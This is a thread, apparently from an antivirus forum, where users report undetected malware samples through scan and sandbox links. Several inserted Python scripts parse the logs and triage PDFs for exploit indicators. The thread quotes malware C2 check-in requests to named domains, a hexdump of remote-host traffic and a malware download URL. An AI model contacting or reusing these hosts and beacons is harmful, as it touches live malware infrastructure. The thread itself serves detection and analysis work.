https://anubis.iseclab.org/?action=result&task_id=1f66db2b0f30ceea42dc774349e143d39&format=html
Trojan.Dropper
-
http://www.virustotal.com/file-scan/report.html?id=9c6008d77f2486a143405d295cb57729d8c8759bf4515aaa2f6b6fea149ce3f5-1324311747
http://virusscan.jotti.org/en/scanresult/36084b8cef9c33f286ed25e79a2d422978ed6c61
FakeAV.HDD
Server DNS Name: manateigolkey.com Service Port: 80
Direction Command User-Agent Host Connection Pragma
GET /up.php?0Q9oBPXEN0uECUgzEJ95RQsagj3vq1aG3F/2q5oNqwOd0A== HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727) manateigolkey.com
Others Cache-Control: no-cache
Server DNS Name: thelangleuber.com Service Port: 80
Direction Command User-Agent Host Connection Pragma
GET /up.php?0Q9oBPXEN0uECUgzEJ95RQsagj3vq1aG3F/2q5oNqwOd0A== HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727) thelangleuber.com
Others Cache-Control: no-cache
Server DNS Name: sixboysowners.com Service Port: 80
Direction Command User-Agent Host Connection Pragma
GET /up.php?0Q9oBPXEN0uECUgzEJ95RQsagj3vq1aG3F/2q5oNqwOd0A== HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727) sixboysowners.com
Others Cache-Control: no-cache
Server DNS Name: lotughtdenve.com Service Port: 80
Direction Command User-Agent Host Connection Pragma
GET /up.php?0Q9oBPXEN0uECUgzEJ95RQsagj3vq1aG3F/2q5oNqwOd0A== HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727) lotughtdenve.com
Others Cache-Control: no-cache
Server DNS Name: gelongotbalebs.com Service Port: 80
Direction Command User-Agent Host Connection Pragma
GET /?ylOdR9GQqXquMlTvsmXlkaz1x3EX+A== HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727) gelongotbalebs.com
Others Cache-Control: no-cache
Server DNS Name: shatretodangun.com Service Port: 80
Direction Command User-Agent Host Connection Pragma
GET /up.php?0Q9oBPXEN0uECUgzEJ95RQsagj3vq1aG3F/2q5oNqwOd0A== HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727) shatretodangun.com
Others Cache-Control: no-cache
Server DNS Name: cozumesubar.com Service Port: 80
Direction Command User-Agent Host Connection Pragma
GET /up.php?0Q9oBPXEN0uECUgzEJ95RQsagj3vq1aG3F/2q5oNqwOd0A== HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727) cozumesubar.com
Others Cache-Control: no-cache
Server DNS Name: rubesolanolex.com Service Port: 80
Direction Command User-Agent Host Connection Pragma
GET /up.php?0Q9oBPXEN0uECUgzEJ95RQsagj3vq1aG3F/2q5oNqwOd0A== HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727) rubesolanolex.com
Others Cache-Control: no-cache
Server DNS Name: zownerubpres.com Service Port: 80
Direction Command User-Agent Host Connection Pragma
GET /?ylOdR9GQqXquMlTvsmXlkaz1x3EX+A== HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727) zownerubpres.com
Others Cache-Control: no-cache
Server DNS Name: nuberolubenyc.com Service Port: 80
Direction Command User-Agent Host Connection Pragma
GET /?ylOdR9GQqXquMlTvsmXlkaz1x3EX+A== HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727) nuberolubenyc.com
Others Cache-Control: no-cache
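The network trace above is more useful as a whole than as ten separate domains: the sample sends the same opaque query blob to host after host, which is a check-in fan-out looking for a live C2. The following is an added example, not code from the forum post: it parses the sandbox log in the "Server DNS Name / Direction Command ..." layout shown above, groups requests by their exact path and query, flags any request sent verbatim to several distinct hosts, and checks whether the query string is one base64 blob rather than `key=value` parameters. The excerpt embedded below is seven of the entries from the post, hosts as posted; the fan-out threshold of three hosts is an assumption made here.

```python
"""Added example (not part of the original post): parse the sandbox network
log quoted above, group requests by exact path+query, and flag requests the
sample sends unchanged to several hosts (C2 fan-out).  The excerpt is from
the post, hosts as posted; the fan-out threshold is an assumption here."""
import base64
import binascii
from collections import defaultdict

LOG = """Server DNS Name: manateigolkey.com Service Port: 80
Direction Command User-Agent Host Connection Pragma
GET /up.php?0Q9oBPXEN0uECUgzEJ95RQsagj3vq1aG3F/2q5oNqwOd0A== HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727) manateigolkey.com
Others Cache-Control: no-cache
Server DNS Name: thelangleuber.com Service Port: 80
Direction Command User-Agent Host Connection Pragma
GET /up.php?0Q9oBPXEN0uECUgzEJ95RQsagj3vq1aG3F/2q5oNqwOd0A== HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727) thelangleuber.com
Others Cache-Control: no-cache
Server DNS Name: sixboysowners.com Service Port: 80
Direction Command User-Agent Host Connection Pragma
GET /up.php?0Q9oBPXEN0uECUgzEJ95RQsagj3vq1aG3F/2q5oNqwOd0A== HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727) sixboysowners.com
Others Cache-Control: no-cache
Server DNS Name: lotughtdenve.com Service Port: 80
Direction Command User-Agent Host Connection Pragma
GET /up.php?0Q9oBPXEN0uECUgzEJ95RQsagj3vq1aG3F/2q5oNqwOd0A== HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727) lotughtdenve.com
Others Cache-Control: no-cache
Server DNS Name: gelongotbalebs.com Service Port: 80
Direction Command User-Agent Host Connection Pragma
GET /?ylOdR9GQqXquMlTvsmXlkaz1x3EX+A== HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727) gelongotbalebs.com
Others Cache-Control: no-cache
Server DNS Name: zownerubpres.com Service Port: 80
Direction Command User-Agent Host Connection Pragma
GET /?ylOdR9GQqXquMlTvsmXlkaz1x3EX+A== HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727) zownerubpres.com
Others Cache-Control: no-cache
Server DNS Name: nuberolubenyc.com Service Port: 80
Direction Command User-Agent Host Connection Pragma
GET /?ylOdR9GQqXquMlTvsmXlkaz1x3EX+A== HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727) nuberolubenyc.com
Others Cache-Control: no-cache
"""


def parse_sandbox_log(text):
    """One dict per request: host/port from the 'Server DNS Name' line, then
    method, target (path+query), user agent and the Host column of the GET line."""
    requests, host, port = [], None, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("Server DNS Name:"):
            parts = line.split()            # "Server DNS Name: <host> Service Port: <port>"
            host, port = parts[3], int(parts[-1])
        elif line.startswith(("GET ", "POST ")):
            method, rest = line.split(" ", 1)
            target, _, tail = rest.partition(" HTTP/1.1 ")
            ua, _, host_col = tail.rpartition(" ")     # UA, then the Host column
            requests.append({"host": host, "port": port, "method": method,
                             "target": target, "user_agent": ua, "host_column": host_col})
    return requests


def group_by_target(requests):
    """target -> set of hosts it was sent to."""
    groups = defaultdict(set)
    for r in requests:
        groups[r["target"]].add(r["host"])
    return groups


def fanout_targets(requests, min_hosts=3):
    """Targets sent verbatim to at least min_hosts distinct hosts (assumed threshold)."""
    return {t: sorted(h) for t, h in group_by_target(requests).items() if len(h) >= min_hosts}


def c2_candidates(requests, min_hosts=3):
    """Every host that received a fanned-out target: the block list from this log."""
    hosts = set()
    for h in fanout_targets(requests, min_hosts).values():
        hosts.update(h)
    return sorted(hosts)


def opaque_query(target):
    """True when the whole query string is a single base64 blob rather than
    key=value parameters, i.e. the bot ships an encoded/encrypted check-in."""
    _, _, query = target.partition("?")
    if not query or "=" in query.rstrip("="):
        return False
    try:
        base64.b64decode(query, validate=True)
        return True
    except (binascii.Error, ValueError):
        return False


if __name__ == "__main__":
    reqs = parse_sandbox_log(LOG)
    for target, hosts in fanout_targets(reqs).items():
        print(len(hosts), "hosts", "opaque" if opaque_query(target) else "params", target)
    print(c2_candidates(reqs))
```

Grouping on the full target is deliberate: a bot that rotated the blob per host would defeat it, but this family did not, and the two distinct blobs here (`/up.php?...` and `/?...`) separate cleanly into two check-in stages.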
-
Not detected by avast - TR/Crypt.CFI.Gen- see: http://www.virustotal.com/url-scan/report.html?id=132341ba37080f8939a990e881d2502c-1324301045
and
http://www.virustotal.com/file-scan/report.html?id=bda30a652d09b6786feada3c8a44e1258d20df0bc9525986e16b3b7c28b1e787-1324304650
polonus
-
http://www.virustotal.com/file-scan/report.html?id=0b529def03e6fe2e97684b1431b2f97b22ad1347bf513c275ff6a43011b0925c-1324391090
https://anubis.iseclab.org/?action=result&task_id=1843010ff24a4968479ef2f65debdcdf4&format=html
http://www.threatexpert.com/report.aspx?md5=ede031e94dba203b2d027e2334a4c352
-
@razoreqx
That looks like a CNET download installer.....FP ?.....or does it come with AdWare
sigcheck:
publisher....: CNET Download.com
copyright....: CBS Interactive
product......: CNET Download.com Installer
description..: CNET Download.com Install
original name: n/a
internal name: CNET Download.com Installer
file version.: v2.0.2.108
comments.....: n/a
signers......: -
signing date.: -
verified.....: Unsigned
-
@razoreqx
That looks like a CNET download installer.....FP ?
sigcheck:
publisher....: CNET Download.com
copyright....: CBS Interactive
product......: CNET Download.com Installer
description..: CNET Download.com Install
original name: n/a
internal name: CNET Download.com Installer
file version.: v2.0.2.108
comments.....: n/a
signers......: -
signing date.: -
verified.....: Unsigned
Got the ThreatExpert report back on that too. Remind me never to download anything from cNET!!
I'm not sure I would call this an FP. Did you see the remote host calls?
00000000 | 3041 3043 7A75 7443 3051 7443 3046 7442 | 0A0CzutC0QtC0FtB
00000010 | 3057 7443 3047 7443 3049 7443 3046 7443 | 0WtC0GtC0ItC0FtC
00000020 | 3054 7443 3051 325A 3046 7443 3052 7443 | 0TtC0Q2Z0FtC0RtC
00000030 | 3046 7443 3048 744E 3050 3143 3049 3044 | 0FtC0HtN0P1C0I0D
00000040 | 7A75 3151 3147 3149 3151 7446 3152 3146 | zu1Q1G1I1QtF1R1F
00000050 | 3148 744E 3055 3049 3044 7A75 7444 7444 | 1HtN0U0I0DzutDtD
00000060 | 7444 3043 7442 7A79 3043 3042 7443 7A7A | tD0CtBzy0C0BtCzz
00000070 | 7942 7443 3044 7443 3041 7945 7444 744E | yBtC0DtC0AyEtDtN
00000080 | 3057 3056 7A75 7944 7446 7443 744E 3057 | 0W0VzuyDtFtCtN0W
00000090 | 3053 3050 7A75 7442 744E 3050 3143 3053 | 0S0PzutBtN0P1C0S
000000A0 | 3259 3153 7A75 744A 3156 3057 3150 3043 | 2Y1SzutJ1V0W1P0C
000000B0 | 3154 3143 3150 744E 3052 3053 7A75 7449 | 1T1C1PtN0R0SzutI
000000C0 | 744E 3054 304B 7A75 7944 7442 7943 7943 | tN0T0KzuyDtByCyC
000000D0 | 7A7A 744E 3057 3150 3043 3154 3143 3150 | zztN0W1P0C1T1C1P
000000E0 | 3053 3150 3142 3142 314C 3146 3147 7A75 | 0S1P1B1B1L1F1Gzu
000000F0 | 7443 7A79 7942 7942 3154 7944 3151 3152 | tCzyyByB1TyD1Q1R
00000100 | 7447 7A7A 7A79 7443 7944 7447 3154 3150 | tGzzzytCyDtG1T1P
00000110 | 7944 3150 7447 7943 7942 3151 7944 7447 | yD1PtGyCyB1QyDtG
00000120 | 3152 7443 314F 7945 3151 3151 7441 3152 | 1RtC1OyE1Q1QtA1R
00000130 | 7444 3153 7942 7442 744E 3049 3052 3056 | tD1SyBtBtN0I0R0V
00000140 | 3045 3052 7A75 7944 7446 7442 7442 744E | 0E0RzuyDtFtBtBtN
00000150 | 3042 3052 3057 7A75 3049 3045 3058 3050 | 0B0R0Wzu0I0E0X0P
00000160 | 304C 304F 3052 3045 7446 3045 3058 3045 | 0L0O0R0EtF0E0X0E
00000170 | 744E 3048 3154 3142 304C 304D 7A75 7443 | tN0H1T1B0L0MzutC
00000180 | 744E 3052 304E 3154 3148 3150 7A75 3152 | tN0R0N1T1H1Pzu1R
00000190 | 744F 7441 3041 744F 7944 3043 3257 314C | tOtA0AtOyD0C2W1L
000001A0 | 3147 3151 3146 3257 3142 744F 7944 3043 | 1G1Q1F2W1BtOyD0C
000001B0 | 3142 3255 3142 325A 3150 3148 7441 7442 | 1B2U1B2Z1P1HtAtB
000001C0 | 744F 7944 3043 3142 3154 3148 3145 3149 | tOyD0C1B1T1H1E1I
000001D0 | 3150 3156 7443 7446 3150 3256 3150 744E | 1P1VtCtF1P2V1PtN
000001E0 | 304C 3154 3147 314E 7A75 3045 3147 314E | 0L1T1G1Nzu0E1G1N
000001F0 | 3149 314C 3142 314D 744E 3049 3045 3056 | 1I1L1B1MtN0I0E0V
00000200 | 3150 3143 7A75 7943 7446 7444 7446 7442 | 1P1CzuyCtFtDtFtB
00000210 | 7A79 7444 7444 7446 7442 7443 7A7A 7444 | zytDtDtFtBtCzztD
00000220 | 744E 304A 3053 7A75 7443 744E 3142 325A | tN0J0SzutCtN1B2Z
00000230 | 3154 3143 325A 3150 3151 7A75 7443 744E | 1T1C2Z1P1QzutCtN
00000240 | 3142 325A 3154 3148 3145 7A75 7443 7444 | 1B2Z1T1H1EzutCtD
00000250 | 7443 7443 7441 7945 7444 7443 744E 304C | tCtCtAyEtDtCtN0L
00000260 | 304D 3156 3053 3045 3043 7A75 7442 744E | 0M1V0S0E0CzutBtN
00000270 | 3154 3145 314C 304C 3146 3154 3151 3054 | 1T1E1L0L1F1T1Q0T
00000280 | 314C 3148 3150 7A75 7945 7943 7A7A 744E | 1L1H1PzuyEyCzztN
00000290 | 3154 3145 314C 3050 3143 3146 3151 3044 | 1T1E1L0P1C1F1Q0D
000002A0 | 3154 325A 3150 7A75 7442 7444 7444 7945 | 1T2Z1PzutBtDtDyE
000002B0 | 7447 7444 7441 7447 7443 7444 744E 3154 | tGtDtAtGtCtDtN1T
000002C0 | 3145 314C 3050 3143 3146 3151 3053 314C | 1E1L0P1C1F1Q0S1L
000002D0 | 3254 3150 7A75 7945 7942 7442 7A79 7444 | 2T1PzuyEyBtBzytD
000002E0 | 7942 7A7A 744E 3145 3154 314E 3150 3048 | yBzztN1E1T1N1P0H
000002F0 | 314C 3142 325A 3146 3143 3255 7A75 3149 | 1L1B2Z1F1C2Uzu1I
00000300 | 3146 3154 3151 314C 3147 314E 3050 3154 | 1F1T1Q1L1G1N0P1T
00000310 | 314E 3150 7448 7942 7443 7A79 744F 7441 | 1N1PtHyBtCzytOtA
00000320 | 3042 3257 3150 3149 3152 3146 3148 3150 | 0B2W1P1I1R1F1H1P
00000330 | 3050 3154 314E 3150 7448 7442 7A79 7942 | 0P1T1N1PtHtBzyyB
00000340 | 744F 7441 3042 3146 314F 314F 3150 3143 | tOtA0B1F1O1O1P1C
00000350 | 3050 3154 314E 3150 7448 7443 7441 7944 | 0P1T1N1PtHtCtAyD
00000360 | 7A79 | zy
This went over port 80. Looks like a CERT?
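Whether a blob like the one dumped above is a certificate can be settled from the bytes themselves. The following is an added example, not code from the forum post: it turns a dump in the `offset | hex words | ascii` layout used above back into bytes (checking that the offsets run contiguously and that the ASCII column agrees with the hex, both of which catch a mangled paste), then runs the checks one would do before calling it a CERT: a DER-encoded X.509 certificate begins with a SEQUENCE tag (0x30, in practice 0x30 0x82 followed by a two-byte length that matches the data), a PEM one begins with `-----BEGIN`, and failing both, the alphabet the bytes use says what kind of encoding is in play. The excerpt embedded below is the first five rows of the dump in the post; the row layout is the one shown there.

```python
"""Added example (not part of the original post): decode an 'offset | hex |
ascii' dump back into bytes and test it for DER / PEM / restricted alphabet.
The excerpt is the first five rows of the dump posted above."""

DUMP = """00000000 | 3041 3043 7A75 7443 3051 7443 3046 7442 | 0A0CzutC0QtC0FtB
00000010 | 3057 7443 3047 7443 3049 7443 3046 7443 | 0WtC0GtC0ItC0FtC
00000020 | 3054 7443 3051 325A 3046 7443 3052 7443 | 0TtC0Q2Z0FtC0RtC
00000030 | 3046 7443 3048 744E 3050 3143 3049 3044 | 0FtC0HtN0P1C0I0D
00000040 | 7A75 3151 3147 3149 3151 7446 3152 3146 | zu1Q1G1I1QtF1R1F
"""


def parse_hexdump(text):
    """Rebuild the bytes.  Raises ValueError if a row's offset does not match
    the bytes read so far, or if the ascii column disagrees with the hex
    column; both indicate a truncated, reordered or hand-edited paste."""
    data = bytearray()
    for row in text.strip().splitlines():
        offset, hexpart, ascii_part = (p.strip() for p in row.split("|", 2))
        if int(offset, 16) != len(data):
            raise ValueError("offset %s out of sequence at byte %d" % (offset, len(data)))
        chunk = bytes.fromhex(hexpart.replace(" ", ""))
        rendered = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        if rendered != ascii_part:
            raise ValueError("ascii column disagrees with hex at offset " + offset)
        data += chunk
    return bytes(data)


def looks_like_der(data):
    """DER X.509: SEQUENCE tag (0x30) followed by a length that spans the
    rest of the data (short form < 0x80, or long form 0x8N + N length bytes)."""
    if len(data) < 4 or data[0] != 0x30:
        return False
    first = data[1]
    if first < 0x80:
        return first + 2 == len(data)
    n = first & 0x7F
    if n == 0 or n > 4 or len(data) < 2 + n:
        return False
    length = int.from_bytes(data[2:2 + n], "big")
    return 2 + n + length == len(data)


def looks_like_pem(data):
    return data.lstrip().startswith(b"-----BEGIN ")


def alphabet_summary(data):
    """Character classes the bytes use.  A blob limited to [0-9A-Za-z] is
    some custom or substitution encoding, not DER and not plain base64
    (which would also use '+', '/' and '=')."""
    return {
        "printable": all(32 <= b < 127 for b in data),
        "alnum_only": all(b < 127 and chr(b).isalnum() for b in data),
        "distinct": len(set(data)),
        "length": len(data),
    }


def classify(data):
    """Coarse verdict on what the dump holds."""
    if looks_like_der(data):
        return "der"
    if looks_like_pem(data):
        return "pem"
    summary = alphabet_summary(data)
    if summary["alnum_only"]:
        return "alnum-encoded"
    return "text" if summary["printable"] else "binary"


if __name__ == "__main__":
    blob = parse_hexdump(DUMP)
    print(len(blob), classify(blob), alphabet_summary(blob))
```

Run against the full dump the same way; the classification needs only the first few bytes, but the offset check needs the rows to be contiguous, so paste the whole thing rather than a selection.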
-
http://www.virustotal.com/file-scan/report.html?id=c0ed59b993c085a9ed81dd955ac3a8d8f83992a68f8ff731330812f7bea9c4d3-1324307337
Do i need to send the file to avast.com or virus total link is ok ?
-
http://www.virustotal.com/file-scan/report.html?id=c0ed59b993c085a9ed81dd955ac3a8d8f83992a68f8ff731330812f7bea9c4d3-1324307337
Do i need to send the file to avast.com or virus total link is ok ?
send it in a password protected zip file to virus @ avast.com
mail subject: undetected sample
zip password: infected
it is recommended to use a zip program that also encrypts the file, this will prevent it from being blocked
winrar or 7zip will do this...
-
Pondus,
You can also find it here: http://forums.malwarebytes.org/index.php?showtopic=102430
contributor = osso. Just searched for the MD5 hash, easy peasy,
polonus
-
Not detected unknown_file_Delivery.Pdf: http://www.virustotal.com/url-scan/report.html?id=2760a374f86eae024e9093bece8fbff9-1324426373
see: http://www.virustotal.com/file-scan/report.html?id=a507423dafb1b47af556093f48f21ded75801a0b78d1d422074a802b13079d85-1324430098
Detected by DrWeb URL scanner:
Checking: -http://academiamates.com/Delivery.zip?PuremobileIncID97089437
Engine version: 5.0.2.3300
Total virus-finding records: 2953092
File size: 47.07 KB
File MD5: 93e77bfff47d620ace7cce9c6a303fe0
-http://academiamates.com/Delivery.zip?PuremobileIncID97089437 - archive ZIP
>-http://academiamates.com/Delivery.zip?PuremobileIncID97089437/Delivery.Pdf____________________________________________________________________________________.exe infected with Trojan.Siggen3.31711
polonus
-
Trojan.Karagany
http://www.virustotal.com/file-scan/report.html?id=a31b5e52c2fb8d0f2e98a4a2ef9c5aa7e3fb1105274251cfea2167fdc910161b-1324479799
http://virusscan.jotti.org/en/scanresult/f3a129b6467e19ebb8f5445e4635caf5d8bd69a2
http://urlquery.net/report.php?id=12955
-
Adware Downloader
http://www.virustotal.com/file-scan/report.html?id=05aee16f88b45a8bfb81d1083fb298193d68942f1b16612b225ce2e77e6d03c5-1324483656
http://virusscan.jotti.org/en/scanresult/328f87e09b442d34377f9e1b8ae6f38ba8590946
http://www.threatexpert.com/report.aspx?md5=38a7083ec6feb55dfca2a0c2607701e4
-
Hi razoreqx,
Is this report somehow related to it? see: http://www.threatexpert.com/report.aspx?md5=5281fd5adcfc75202622bc586043e282
See: http://jsunpack.jeek.org/dec/go?report=d495bbeb8ebb44c204e25422b65d814d1f220d0e
polonus
-
Hi razoreqx,
Is this report somehow related to it? see: http://www.threatexpert.com/report.aspx?md5=5281fd5adcfc75202622bc586043e282
See: http://jsunpack.jeek.org/dec/go?report=d495bbeb8ebb44c204e25422b65d814d1f220d0e
polonus
I just got that back about 10 mins ago.. You're fast
-
Not bashing CNET but anything that modifies my firewall rules, and without asking I have an issue with!
http://www.virustotal.com/file-scan/report.html?id=751850a5e527c5987201d400fae2ac8aab0f644a042af89c2e02aaa757f06ea3-1324494179
http://www.threatexpert.com/report.aspx?md5=bb411fef75d17a07bc82da72b67919cc
http://virusscan.jotti.org/nl/scanresult/d443623bd73f4f10a8caa76b5902bf5d1524716a
http://support.clean-mx.de/clean-mx/viruses.php?domain=we-care.com&sort=email%20asc
https://anubis.iseclab.org/?action=result&task_id=174430ff4cd876654254372d4c6abb2de&format=html
http://urlquery.net/report.php?id=12984
-
Hi razoreqx,
This is what I get back from a bad iFrame detector scan:
Check took 6.06 seconds
(Level: 0) Url checked:
-http://we-care.com
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 1) Url checked: (script source)
-http://www.we-care.com/templates/ac_runactivecontent.js
Blank page / could not connect
No ad codes identified
(Level: 1) Url checked: (script source)
-http://www.we-care.com/templates/wc.js
Blank page / could not connect
No ad codes identified
(Level: 1) Url checked: (script source)
-http://www.we-care.com/templates/fat.js
Blank page / could not connect
No ad codes identified
(Level: 1) Url checked: (script source)
-http://we-care.com//scripts/jquery.js
Blank page / could not connect
No ad codes identified
(Level: 1) Url checked: (script source)
-http://tag.didit.com/js/tman_iframe.js
Zeroiframes detected on this site: 1
No ad codes identified
(Level: 2) Url checked: (iframe source)
-http://tag.didit.com/js/+d+
Blank page / could not connect
No ad codes identified
(Level: 2) Url checked: (script source)
-http://tag.didit.com/js/+scriptstr;jscall+=&tmlogit=0;if(tmparam.tmcampid||tmparam.levrev||tmparam.levresdes)window.tmcbrequired=1;jscall+=&tmtag=js
Blank page / could not connect
No ad codes identified
(Level: 1) Url checked: (script source)
-http://www.google-analytics.com/urchin.js
Zeroiframes detected on this site: 0
No ad codes identified
see (embed) -cdn.we-care.com/Content/SWF/titles.swf?tvalue=Responsible+Shopping+and+the+We-Care.com+Community&tcolor=0xFF6600
All of these will eventually redirect to appnexus.com, an ad retargeter with not such a good web reputation:
http://www.mywot.com/en/scorecard/appnexus.com
http://www.webutation.net/go/review/appnexus.com
polonus
-
Avast does not detect this SpyEye binary:
http://www.virustotal.com/url-scan/report.html?id=c37f975f900b98d2b5d61a18f69c1e2b-1324488656
and
http://www.virustotal.com/file-scan/report.html?id=e4767c0989108a271011e117871e0fad141bd44ec3a119080e2bac864a7b0ad3-1324492270
Anubis report from SpyEyeTracker: http://anubis.iseclab.org/?action=result&task_id=13c4c9e7e7c442f5419f26785d839c2cc
polonus
-
The link is dead now
http://www.virustotal.com/url-scan/report.html?id=c37f975f900b98d2b5d61a18f69c1e2b-1324505134
-
Hi Pondus,
You are right, status: offline. But avast did not have it, had it been up and alive,
pol
-
sooner or later they receive it from VT
-
What? CNET is messing with firewall rules? Is it possible? Am I reading correctly?
-
What? CNET is messing with firewall rules? Is it possible? Am I reading correctly?
User desktop firewall... Not perimeter fw... the details are in the sandbox output
-
http://www.virustotal.com/file-scan/report.html?id=d9c38651d8b9e3bfb50eb19070e49398599f60b2413554e6cf0103f4680ba8da-1324560750
Sample sent
-
Not detected: TR/Hijacker.Gen
See: http://www.virustotal.com/url-scan/report.html?id=5c6dd3a08ed1467955086049015a5d38-1324677601
and
http://www.virustotal.com/file-scan/report.html?id=1221916ed2f4bcab2141e378aa0670601742fdad787c0b7d59dc93f977125ea8-1324681317
See: http://reports.antivirus-lab.com/13726/winudapter-exe-2/
polonus
-
Polonus: we'll never thank you enough for helping improve detection. Merry Christmas.
-
Polonus: we'll never thank you enough for helping improve detection. Merry Christmas.
+1 :)
-
Polonus should be a virus analyst in this case ::) ;D
-
Hi forum friends,
Missed PUA.Script.PDF.EmbeddedJavaScript, see: http://www.virustotal.com/url-scan/report.html?id=a19a42caa602f40334b29884f0e44d51-1324851413
and
http://www.virustotal.com/file-scan/report.html?id=27d65ecd5ad0142f541e3b896651ad143522b3c80862c95c7c3310bcd592c723-1324855026
See: http://urlquery.net/queued.php?id=13411 verdict malicious
compressed Filter/FlateDecode stream object
polonus
-
Good catch. - Definitely malware..!!! ;)
-
Hi Asyn,
Hope this will help avast detection. Especially users with older Adobe Reader and Acrobat versions are vulnerable to the exploits used here: Collab.collectEmailInfo() JavaScript Overflow (CVE-2007-5659) and Util.printf() JavaScript Overflow (CVE-2008-2992).
This malware takes advantage of a vulnerability to remotely access or attack a program, computer or server,
Damian
-
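The two posts above describe the same kind of sample: a PDF whose JavaScript sits in a compressed FlateDecode stream object and calls one of the APIs affected by CVE-2007-5659 (Collab.collectEmailInfo) or CVE-2008-2992 (Util.printf). The following triage script is an added example written for this thread; it is not code from either poster or from avast. It inflates FlateDecode streams, looks for JavaScript actions, and reports which of the two API names appears. The PDF it scans is constructed inline by build_sample_pdf (a helper that exists only for this example), so nothing is fetched from the reported URLs.

```python
import re
import zlib
from typing import Dict, List

# Triage indicators for the two vulnerabilities named in the post. Seeing the
# API name in a script warrants a closer look; it is not by itself proof of
# exploitation (legitimate forms use these APIs too).
INDICATORS = {
    b"collab.collectemailinfo": "CVE-2007-5659",
    b"util.printf": "CVE-2008-2992",
}

# A stream object: a dictionary (one level of nesting allowed) followed by the
# "stream" keyword. The body is sized from a direct /Length where one exists, so
# binary data never has to be scanned for the "endstream" keyword.
STREAM_RE = re.compile(rb"<<(?P<dict>(?:[^<>]|<<[^<>]*>>)*)>>\s*stream\r?\n")
DIRECT_LENGTH_RE = re.compile(rb"/Length\s+(\d+)\b(?!\s+\d+\s+R)")


def extract_streams(pdf: bytes) -> List[Dict[str, object]]:
    """Return every stream in the file, inflating the body where FlateDecode applies."""
    streams = []
    for m in STREAM_RE.finditer(pdf):
        d = m.group("dict")
        start = m.end()
        lm = DIRECT_LENGTH_RE.search(d)
        if lm:
            body = pdf[start:start + int(lm.group(1))]
        else:  # indirect /Length (e.g. "10 0 R"): fall back to the keyword search
            end = pdf.find(b"endstream", start)
            body = pdf[start:end if end != -1 else len(pdf)].rstrip(b"\r\n")
        compressed = b"/FlateDecode" in d
        decode_ok = True
        if compressed:
            try:
                body = zlib.decompress(body)
            except zlib.error:
                body, decode_ok = b"", False  # corrupt or truncated stream: still worth noting
        streams.append({"compressed": compressed, "decode_ok": decode_ok, "data": body})
    return streams


def triage_pdf(pdf: bytes) -> Dict[str, object]:
    """Summarise JavaScript presence, compressed streams and exploit indicators."""
    result = {"has_javascript": False, "compressed_streams": 0,
              "undecodable_streams": 0, "indicators": []}
    texts = [pdf]  # the raw file plus every decoded stream body
    for s in extract_streams(pdf):
        if s["compressed"]:
            result["compressed_streams"] += 1
        if not s["decode_ok"]:
            result["undecodable_streams"] += 1
        texts.append(s["data"])
    for text in texts:
        if b"/JavaScript" in text or b"/JS" in text:
            result["has_javascript"] = True
        lowered = text.lower()
        for needle, cve in INDICATORS.items():
            if needle in lowered and cve not in result["indicators"]:
                result["indicators"].append(cve)
    return result


def build_sample_pdf(js: bytes) -> bytes:
    """Build a minimal, constructed PDF whose OpenAction script lives in a FlateDecode stream."""
    payload = zlib.compress(js)
    objects = [
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >>",
        b"<< /Type /Pages /Kids [] /Count 0 >>",
        b"<< /S /JavaScript /JS 4 0 R >>",
        b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(payload) + payload + b"\nendstream",
    ]
    out = b"%PDF-1.4\n"
    for n, obj in enumerate(objects, 1):
        out += b"%d 0 obj\n" % n + obj + b"\nendobj\n"
    return out + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"


if __name__ == "__main__":
    # Constructed sample: the API name alone is enough to trip the indicator.
    sample = build_sample_pdf(b"var m = 'constructed'; Collab.collectEmailInfo({msg: m});")
    print(triage_pdf(sample))
```

Run against a real file, the interesting output is a script that only exists after inflation: a scanner that pattern-matches the raw bytes without decoding FlateDecode streams sees neither the API name nor, in many cases, the /JavaScript keyword, which is the gap the PUA.Script.PDF.EmbeddedJavaScript naming refers to.
-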
See: http://www.virustotal.com/url-scan/report.html?id=1c99945185ca03882745329c8e2b15ce-1325103177
and
http://www.virustotal.com/file-scan/report.html?id=f5ffb9d7575551b6470a92b9213a47f78f0a8910b4fa11f9295d758c33ab0f27-1325106790
unknown exe See: http://www.threatexpert.com/report.aspx?md5=8aac478bb8ba38a3b03a3d30cda9b510
polonus
-
optimize virustotal .... :>
https://new.virustotal.com/
Java fake
http://virusscan.jotti.org/en/scanresult/288920b9ae922935e775d529b182ae30f40655b7
-
Nice, the new https VT now has a 32MB upload limit.
